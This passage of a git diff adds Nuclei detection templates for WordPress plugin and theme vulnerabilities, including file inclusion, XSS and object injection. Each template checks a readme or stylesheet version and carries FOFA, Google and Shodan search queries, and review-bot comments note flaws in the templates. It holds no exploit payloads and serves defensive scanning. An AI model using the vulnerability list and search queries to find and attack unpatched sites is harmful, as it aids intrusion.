+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/invite-anyone/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "invite-anyone"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43328.yaml b/poc/cve/CVE-2024-43328.yaml
new file mode 100644
index 0000000000..24b9c81d75
--- /dev/null
+++ b/poc/cve/CVE-2024-43328.yaml
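Review bot: The two `extractors` entries are byte-identical apart from `internal: true` on the first and both are named `version`, and nothing in the file explains why the same regex runs twice. If the intent is that the internal copy feeds `compare_versions` while the second is the one surfaced in the scan output, a comment above the block such as `# first extractor is consumed by the dsl matcher; the second repeats it so the detected version is printed with the result` would keep the next editor from "de-duplicating" it and silently losing the version in reports. Every template in this commit repeats the pattern, so the comment belongs in whatever generator produces them.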
@@ -0,0 +1,59 @@
+id: CVE-2024-43328
+
+info:
+ name: >
+ EmbedPress <= 4.0.9 - Unauthenticated Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+ The EmbedPress – Embed PDF, 3D Flipbook, Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Audios, Google Maps in Gutenberg Block & Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.9 via the 'page_type' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a1b117-945f-49bc-9ea1-313afa93bf32?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43328
+ metadata:
+ fofa-query: "wp-content/plugins/embedpress/"
+ google-query: inurl:"/wp-content/plugins/embedpress/"
+ shodan-query: 'vuln:CVE-2024-43328'
+ tags: cve,wordpress,wp-plugin,embedpress,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/embedpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "embedpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.9')
\ No newline at end of file
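Review bot: The only evidence this template gathers is the `Stable tag` line of readme.txt, so a `critical` unauthenticated-LFI result is raised without ever touching the `page_type` parameter the description names; readme.txt is often left with a stale Stable tag after updates and stays web-readable while a plugin is deactivated, so what is reported is a version fingerprint, not a confirmed exposure. That is a reasonable design for an inventory check, but the template should say so to the person reading the alert — for instance `remediation: Update past 4.0.9. This template only fingerprints the installed version from readme.txt and does not confirm exploitability; verify before escalating.` under `info`. The same caveat applies to every template in this commit, since all of them use this readme-only probe.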
diff --git a/poc/cve/CVE-2024-43335.yaml b/poc/cve/CVE-2024-43335.yaml
new file mode 100644
index 0000000000..7617009a9c
--- /dev/null
+++ b/poc/cve/CVE-2024-43335.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43335
+
+info:
+ name: >
+ Responsive Blocks – WordPress Gutenberg Blocks <= 1.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Responsive Blocks – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the taxonomy block in versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c894de0-2ea7-4002-9c26-0e3e59744a5e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43335
+ metadata:
+ fofa-query: "wp-content/plugins/responsive-block-editor-addons/"
+ google-query: inurl:"/wp-content/plugins/responsive-block-editor-addons/"
+ shodan-query: 'vuln:CVE-2024-43335'
+ tags: cve,wordpress,wp-plugin,responsive-block-editor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/responsive-block-editor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "responsive-block-editor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43342.yaml b/poc/cve/CVE-2024-43342.yaml
new file mode 100644
index 0000000000..767239ef86
--- /dev/null
+++ b/poc/cve/CVE-2024-43342.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43342
+
+info:
+ name: >
+ Ultimate Store Kit Elementor Addons <= 1.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Ultimate Store Kit Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/51a4886b-2e15-4d91-b853-4a675120a9e9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43342
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-store-kit/"
+ google-query: inurl:"/wp-content/plugins/ultimate-store-kit/"
+ shodan-query: 'vuln:CVE-2024-43342'
+ tags: cve,wordpress,wp-plugin,ultimate-store-kit,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-store-kit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-store-kit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43344.yaml b/poc/cve/CVE-2024-43344.yaml
new file mode 100644
index 0000000000..17820548d9
--- /dev/null
+++ b/poc/cve/CVE-2024-43344.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43344
+
+info:
+ name: >
+ Icegram <= 3.1.25 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Icegram plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.1.25 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/230f40c1-a8a9-4932-a3f1-ecddc52acca9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43344
+ metadata:
+ fofa-query: "wp-content/plugins/icegram/"
+ google-query: inurl:"/wp-content/plugins/icegram/"
+ shodan-query: 'vuln:CVE-2024-43344'
+ tags: cve,wordpress,wp-plugin,icegram,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.25')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43345.yaml b/poc/cve/CVE-2024-43345.yaml
new file mode 100644
index 0000000000..f880d6e5ca
--- /dev/null
+++ b/poc/cve/CVE-2024-43345.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43345
+
+info:
+ name: >
+ Landing Page Builder <= 1.5.2.0 - Authenticated (Editor+) Local File Inlcusion
+ author: topscoder
+ severity: low
+ description: >
+ The Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.2.0. This makes it possible for authenticated attackers, with Editor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bacfa993-2fc1-43bc-b4f0-f463ba28b4ed?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-43345
+ metadata:
+ fofa-query: "wp-content/plugins/page-builder-add/"
+ google-query: inurl:"/wp-content/plugins/page-builder-add/"
+ shodan-query: 'vuln:CVE-2024-43345'
+ tags: cve,wordpress,wp-plugin,page-builder-add,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/page-builder-add/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "page-builder-add"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.2.0')
\ No newline at end of file
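Review bot: `name` reads `Local File Inlcusion`; the misspelling is copied into every report line this template produces and defeats text searches for "Inclusion" across scan output, so it should be `Landing Page Builder <= 1.5.2.0 - Authenticated (Editor+) Local File Inclusion`. The description and the Wordfence entry both spell it correctly, so only the name needs the fix.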
diff --git a/poc/cve/CVE-2024-43346.yaml b/poc/cve/CVE-2024-43346.yaml
new file mode 100644
index 0000000000..f693eff89b
--- /dev/null
+++ b/poc/cve/CVE-2024-43346.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43346
+
+info:
+ name: >
+ Modal Window <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Modal Window plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7790777d-9421-48c6-b789-f1feab109ec7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43346
+ metadata:
+ fofa-query: "wp-content/plugins/modal-window/"
+ google-query: inurl:"/wp-content/plugins/modal-window/"
+ shodan-query: 'vuln:CVE-2024-43346'
+ tags: cve,wordpress,wp-plugin,modal-window,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/modal-window/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "modal-window"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43348.yaml b/poc/cve/CVE-2024-43348.yaml
new file mode 100644
index 0000000000..4793f7c08d
--- /dev/null
+++ b/poc/cve/CVE-2024-43348.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43348
+
+info:
+ name: >
+ Purity Of Soul <= 1.9 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Purity Of Soul theme for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53d2f416-4b0f-49b7-af14-fbb225aac34d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43348
+ metadata:
+ fofa-query: "wp-content/themes/purity-of-soul/"
+ google-query: inurl:"/wp-content/themes/purity-of-soul/"
+ shodan-query: 'vuln:CVE-2024-43348'
+ tags: cve,wordpress,wp-theme,purity-of-soul,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/purity-of-soul/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "purity-of-soul"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43350.yaml b/poc/cve/CVE-2024-43350.yaml
new file mode 100644
index 0000000000..fc208f7c3e
--- /dev/null
+++ b/poc/cve/CVE-2024-43350.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43350
+
+info:
+ name: >
+ Propovoice CRM <= 1.7.6.4 - Unauthenticated Insecure Direct Object Reference
+ author: topscoder
+ severity: medium
+ description: >
+ The Propovoice: All-in-One Client Management System plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.7.6.4 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/25acd3d9-0c1a-426e-b670-b842f031bdc5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43350
+ metadata:
+ fofa-query: "wp-content/plugins/propovoice/"
+ google-query: inurl:"/wp-content/plugins/propovoice/"
+ shodan-query: 'vuln:CVE-2024-43350'
+ tags: cve,wordpress,wp-plugin,propovoice,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/propovoice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "propovoice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43352.yaml b/poc/cve/CVE-2024-43352.yaml
new file mode 100644
index 0000000000..bbc7d30db6
--- /dev/null
+++ b/poc/cve/CVE-2024-43352.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43352
+
+info:
+ name: >
+ GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The GivingPress Lite theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43352
+ metadata:
+ fofa-query: "wp-content/themes/givingpress-lite/"
+ google-query: inurl:"/wp-content/themes/givingpress-lite/"
+ shodan-query: 'vuln:CVE-2024-43352'
+ tags: cve,wordpress,wp-theme,givingpress-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "givingpress-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43353.yaml b/poc/cve/CVE-2024-43353.yaml
new file mode 100644
index 0000000000..940656b810
--- /dev/null
+++ b/poc/cve/CVE-2024-43353.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43353
+
+info:
+ name: >
+ myCred <= 2.7.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The myCred plugin for WordPress is vulnerable to Stored Cross-Site Scripting via wrapper attribute in versions up to, and including, 2.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69695e2e-2086-4d50-8518-0b2f5ab9ea56?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43353
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:CVE-2024-43353'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43354.yaml b/poc/cve/CVE-2024-43354.yaml
new file mode 100644
index 0000000000..c9a9511ae6
--- /dev/null
+++ b/poc/cve/CVE-2024-43354.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43354
+
+info:
+ name: >
+ myCred <= 2.7.2 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.7.2 via deserialization of untrusted input from the 'data' parameter This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44ea3322-10f6-4f52-8fa8-8cc2632b67ce?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-43354
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:CVE-2024-43354'
+ tags: cve,wordpress,wp-plugin,mycred,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
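Review bot: `description` runs two sentences together at `from the 'data' parameter This makes it possible`; it should read `from the 'data' parameter. This makes it possible`. The same text also records that no known POP chain exists in the plugin itself — that qualifier is the main reason a reader would treat the `critical` label with caution, so it is worth keeping as written rather than trimming when the description is tidied.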
diff --git a/poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml b/poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml
new file mode 100644
index 0000000000..31946ef2f1
--- /dev/null
+++ b/poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-4359-739b7c6397af07930a602ed827679ba1
+
+info:
+ name: >
+ Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) <= 5.7.2 - Authenticated (Contributor+) Arbitrary File Read
+ author: topscoder
+ severity: low
+ description: >
+ The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to arbitrary file reads in all versions up to, and including, 5.7.2 via the SVG widget and a lack of sufficient file validation in the render_svg function. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a55cfeb3-7632-4a88-ac71-8e119b060721?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-4359
+ metadata:
+ fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/"
+ google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/"
+ shodan-query: 'vuln:CVE-2024-4359'
+ tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bdthemes-element-pack-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.7.2')
\ No newline at end of file
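Review bot: `id` is `CVE-2024-4359-739b7c6397af07930a602ed827679ba1` while `cve-id` is the bare `CVE-2024-4359` and the file name carries the same 32-hex suffix, but nothing in the file says what the suffix is for; it looks like a hash chosen to avoid colliding with an existing CVE-2024-4359 template elsewhere, though that is inference. A one-line comment at the top of the file, e.g. `# id carries a suffix so it stays distinct from the existing CVE-2024-4359 template; cve-id holds the canonical identifier`, would make the convention visible to anyone filtering results by id, and the same applies to CVE-2024-6493, CVE-2024-6499 and CVE-2024-6617 in this commit.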
diff --git a/poc/cve/CVE-2024-5502.yaml b/poc/cve/CVE-2024-5502.yaml
new file mode 100644
index 0000000000..4bcc03a886
--- /dev/null
+++ b/poc/cve/CVE-2024-5502.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5502
+
+info:
+ name: >
+ Piotnet Addons For Elementor <= 2.4.30 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets
+ author: topscoder
+ severity: low
+ description: >
+ The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Accordion, Dual Heading, and Vertical Timeline widgets in all versions up to, and including, 2.4.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/921616e4-2b66-4847-869a-90c1c459685f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5502
+ metadata:
+ fofa-query: "wp-content/plugins/piotnet-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/piotnet-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-5502'
+ tags: cve,wordpress,wp-plugin,piotnet-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/piotnet-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "piotnet-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.30')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml b/poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml
new file mode 100644
index 0000000000..40aea3b702
--- /dev/null
+++ b/poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9
+
+info:
+ name: >
+ NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The NinjaTeam Header Footer Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
